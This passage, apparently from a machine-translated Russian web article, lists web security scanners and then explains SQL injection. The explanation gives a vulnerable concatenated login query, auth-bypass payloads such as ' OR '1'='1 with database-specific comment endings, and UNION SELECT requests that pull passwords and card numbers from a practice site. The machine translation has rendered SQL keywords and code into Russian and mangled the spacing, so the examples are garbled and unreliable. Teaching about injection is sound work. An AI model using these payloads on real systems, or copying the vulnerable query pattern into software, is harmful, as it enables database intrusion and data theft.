Vega выглядит многообещающим СВОБОДНЫМ сканером безопасности в Интернете.

7. SQLMap

SQLMap – один из самых популярных инструментов для тестирования с открытым исходным кодом, чтобы выполнить инъекцию SQL против системы управления реляционными базами данных.

Sqlmap перечисляет пользователей, пароли, хеши, роли, базу данных, таблицы, столбцы чтобы сдампить таблицы базы данных полностью.

Если вы используете Kali Linux, то вы можете использовать SQLMap там также, не устанавливая его.

8. SQL Inject Me

SQL Inject Me это Аддон Firefox, которое через поля HTML-формы ищут сообщение об ошибке на выходной странице.

Если бы вы проектируете форму ввода, соединяющуюся с базой данных по localhost, и хотели бы протестировать, прежде чем ставить на реальный сервер, SQL Inject Me, был бы хороший выбор.

9. Netsparker

Netsparker – один из популярных сканеров безопасности в Интернете, существует облачная версия и десктоп. Он обнаруживает большое количество дефектов безопасности включая лучшие 10 по версии OWASP.

Netsparker может быть интегрирован в жизненный цикл разработки программного обеспечения для непрерывной безопасности.

10. Appspider

Appspider от Rapid7 – динамическое решение для тестирования безопасности приложений проверить и протестировать веб-приложение больше чем на 80 типов атак.

Что такое SQL-инъекция? | Как это работает и типы SQL-инъекций

  # Определить переменные POST
  uname = request.POST ['имя пользователя'] 
  passwd = request.POST ['пароль'] 

# SQL-запрос уязвим для SQLi
sql = «ВЫБРАТЬ ИД ОТ пользователей ГДЕ username =’ »+  uname  +« ’AND password =’ »+  passwd  +« ’»

# Выполнить инструкцию SQL
база данных.выполнить (sql)  

  пароль 'ИЛИ 1 = 1  

  ВЫБЕРИТЕ идентификатор ИЗ пользователей, ГДЕ имя пользователя = 'имя пользователя' И пароль =  'пароль' ИЛИ ​​1 = 1  ' 

  - MySQL, MSSQL, Oracle, PostgreSQL, SQLite
'ИЛИ' 1 '=' 1 '–
'ИЛИ' 1 '=' 1 ' / * 
- MySQL
'ИЛИ' 1 '=' 1 ' # 
- Доступ (с использованием нулевых символов)
'ИЛИ' 1 '=' 1 '% 00 
'ИЛИ' 1 '=' 1 '% 16   

  ПОЛУЧИТЬ http://testphp.vulnweb.com/artists.php?artist=  1  HTTP / 1.1
Хост: testphp.vulnweb.com  

  GET http://testphp.vulnweb.com/artists.php?artist= -1 UNION SELECT 1, 2, 3  HTTP / 1.1
Хост: testphp.vulnweb.com  

  ПОЛУЧИТЬ http: // testphp.vulnweb.com/artists.php?artist=  -1 UNION SELECT 1, pass, cc FROM users WHERE uname = 'test'  HTTP / 1.1
Хост: testphp.vulnweb.com